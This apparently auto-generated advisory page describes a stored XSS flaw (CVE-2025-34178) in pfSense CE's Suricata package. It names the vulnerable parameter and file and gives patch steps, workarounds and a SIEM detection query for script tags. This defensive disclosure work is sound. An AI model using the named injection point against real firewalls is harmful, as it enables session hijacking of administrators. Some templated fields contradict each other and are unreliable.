CVE-2025-34178 – This stored XSS vulnerability in pfSense CE's S... (How to Fix)

Q: What is the severity of CVE-2025-34178?

CVE-2025-34178 has a CVSS score of 5.4 (MEDIUM). This stored XSS vulnerability in pfSense CE's Suricata package allows authenticated attackers with specific permissions to inject malicious scripts into the web interface. When other administrators view the affected page, the scripts execute in their browser context, potentially compromising their sessions or performing unauthorized actions. Only users with 'WebCfg - Services: suricata package' permissions are affected.

📋 TL;DR

This stored XSS vulnerability in pfSense CE's Suricata package allows authenticated attackers with specific permissions to inject malicious scripts into the web interface. When other administrators view the affected page, the scripts execute in their browser context, potentially compromising their sessions or performing unauthorized actions. Only users with 'WebCfg - Services: suricata package' permissions are affected.

💻 Affected Systems

Products:

pfSense CE

Versions: Versions before the fix in commit 97852ccfd201b24ee542be30af81272485fde0b4

Operating Systems: FreeBSD-based pfSense installations

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects installations with Suricata package installed and configured. Requires attacker to have 'WebCfg - Services: suricata package' permissions.

📦 What is this software?

Pfsense by Pfsense

View all CVEs affecting Pfsense →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker could steal administrator session cookies, perform CSRF attacks to change firewall rules, or redirect users to malicious sites, potentially leading to full system compromise.

🟠

Likely Case

Session hijacking of administrators viewing the Suricata configuration page, allowing the attacker to perform actions with the victim's privileges.

🟢

If Mitigated

Limited to authenticated users with specific permissions; impact contained to administrative interface with proper network segmentation.

🌐 Internet-Facing: MEDIUM - If pfSense web interface is exposed to the internet, authenticated attackers could exploit this, but requires specific permissions.

🏢 Internal Only: MEDIUM - Internal attackers with appropriate permissions could exploit this to escalate privileges or compromise other administrators.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Requires authenticated access with specific permissions. Exploitation involves injecting XSS payloads into the policy_name parameter that get stored and executed when viewed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version containing commit 97852ccfd201b24ee542be30af81272485fde0b4

Vendor Advisory: https://redmine.pfsense.org/issues/16414

Restart Required: No

Instructions:

1. Update pfSense CE to latest version. 2. Apply the specific patch from commit 97852ccfd201b24ee542be30af81272485fde0b4. 3. No service restart required.

🔧 Temporary Workarounds

Remove vulnerable permissions

all

Temporarily remove 'WebCfg - Services: suricata package' permissions from non-essential users

Disable Suricata package

all

If not needed, disable the Suricata package entirely

🧯 If You Can't Patch

Restrict access to Suricata configuration page to only essential administrators
Implement Content Security Policy headers to mitigate XSS impact

🔍 How to Verify

Check if Vulnerable:

Check if your pfSense version includes the vulnerable code in /suricata/suricata_app_parsers.php before the fix commit

Check Version:

pfSense version check via web interface or 'cat /etc/version' on CLI

Verify Fix Applied:

Verify that the policy_name parameter in /suricata/suricata_app_parsers.php now properly sanitizes HTML characters before display

📡 Detection & Monitoring

Log Indicators:

Unusual modifications to Suricata policy names containing script tags or JavaScript
Multiple failed authentication attempts followed by successful login to Suricata interface

Network Indicators:

Unexpected outbound connections from pfSense admin interface to external domains

SIEM Query:

source="pfSense" AND (event_type="web_access" AND uri="/suricata/suricata_app_parsers.php" AND (params CONTAINS "<script>" OR params CONTAINS "javascript:"))

📊 Metadata

CVE ID: CVE-2025-34178

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.02% exploit probability (3th percentile)

Published: September 9, 2025

Last Updated: October 10, 2025

🔗 References

https://github.com/pfsense/FreeBSD-ports/commit/97852ccfd201b24ee542be30af81272485fde0b4 Patch
https://redmine.pfsense.org/issues/16414 Issue Tracking
https://www.vulncheck.com/advisories/netgate-pf-sense-ce-suricata-package-stored-xss Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-34178, you might also want to check these: